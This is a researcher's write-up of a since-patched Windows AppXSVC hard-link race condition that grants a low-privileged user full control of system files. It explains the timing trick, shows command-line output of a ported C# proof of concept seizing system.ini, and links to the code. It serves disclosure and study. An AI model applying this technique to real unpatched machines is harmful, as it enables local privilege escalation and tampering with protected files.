Intro

Security researcher SandboxEscaper dropped a zero-day this week exploiting a race condition in the Windows AppX Deployment Service (AppXSVC). This was due to the service not handling hard links properly. Another zero-day (CVE-2019-0841) affecting the same service was previously fixed in April.

As Microsoft have now provided a fix for this in June’s Patch Tuesday updates, I’ve ported SandboxEscaper’s original PoC to C# (thanks to Rastamouse for C# hand holding). The original PoC also targetted Windows Edge which I found unstable and a bit fiddly. I’ve found that targetting Cortana rather than Edge, appears to be more stable and doesn’t require any user interaction if you’re prepared to wait a while. Alternatively, clicking the Start Menu seems to kick it into life.

Details

When any of the folder structures under a user’s AppData\Local\Packages gets removed, the folder structures will get recreated by binaries located under C:\WINDOWS\SystemApps\.

For instance, if we remove C:\users\rythmstick\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy, the folder structure will get recreated by a call to
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchIU.exe -ServerName:CortanaUI.AppXa....epj.mca


Whilst recreating the folder structure, the DACLs on the LocalState Folders contents will get updated by NT AUTHORITY\SYSTEM. If we can drop a hard link into this folder between the time it gets created and the time the DACLs get updated we have an opportunity to overwrite DACLs for any files that NT AUTHORITY\SYSTEM has full control of.

Proof of Concept

 
C:\Users\rythmstick>icacls c:\windows\system.ini
c:\windows\system.ini NT AUTHORITY\SYSTEM:(I)(F)
                      BUILTIN\Administrators:(I)(F)
                      BUILTIN\Users:(I)(RX)
                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                      APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APP PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

C:\Users\rythmstick>AppXSVC_poc.exe c:\windows\system.ini
[+] Removing C:\Users\rythmstick\AppData\Local\packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState
[+] Waiting to Create Hardlink
[+] Created Hardlink to c:\windows\system.ini
[+] You have Full Control

C:\Users\rythmstick>icacls c:\windows\system.ini
c:\windows\system.ini S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742:(I)(F)
                      NT AUTHORITY\SYSTEM:(I)(F)
                      BUILTIN\Administrators:(I)(F)
                    * DESKTOP\rythmstick:(I)(F)
                      Mandatory Label\Low Mandatory Level:(I)(NW)

Successfully processed 1 files; Failed processing 0 files

C:\Users\rythmstick>
 


Let’s see what happened in Process Monitor.

screenshot

Our PoC removes the LocalState Folder.

(1) It then goes into a loop waiting for the LocalState folder to be recreated by AppXSVC.

(2) AppXSVC recreates the LocalState Folder running as NT AUTHORITY\SYSTEM.

(3) Our PoC finds the LocalState Folder, and immediately creates the hardlink rs.txt to C:\WINDOWS\SYSTEM.INI. You can see the SetLinkInformationFile operation directly below (3).

screenshot

(4) AppXSVC enumerates the contents of the LocalState folder and ‘picks up’ our hard link.

screenshot

(5) AppXSVC amends the DACLs on our hardlink (to C:\WINDOWS\SYSTEM.INI) giving our user Full Control.

screenshot


PoC available here. As this is a race condition you may need to run the PoC a few times, although it seems to win quite often after increasing the Thread Priority.